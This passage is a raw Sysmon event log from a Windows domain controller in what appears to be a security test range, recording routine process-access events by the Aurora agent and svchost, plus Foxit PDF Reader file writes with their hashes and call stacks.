Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045212Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.798{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045211Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.797{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045210Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.796{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045209Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.795{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000045208Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.795{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=9DDCDF1111B5D4F70479484D303DF8C9,SHA256=66E865B00C3113BB6D63EC6F49DF5D7B97970CFE4EB9CE2ABD3C2330B4CE75F2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045207Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.793{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000045206Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.777{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=97A4ED0E45BB65BF213BC1A086D8D994,SHA256=F79DCE459FF982F12C74BD9BBF24606E84D2AE685AEACC24835F4DAB14E4C6FD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045205Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.286{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045204Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.286{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045203Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.286{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045202Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.285{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045201Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.285{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045200Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.285{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045199Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.285{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045198Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.285{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045197Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.285{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045196Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.285{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045195Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.285{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045194Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.285{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045193Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.285{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045192Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.285{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045191Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.285{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045190Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.285{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045189Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.285{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045188Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.285{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045187Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.284{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045186Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.284{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045185Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.284{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045184Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.284{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045183Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.284{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045182Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.284{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 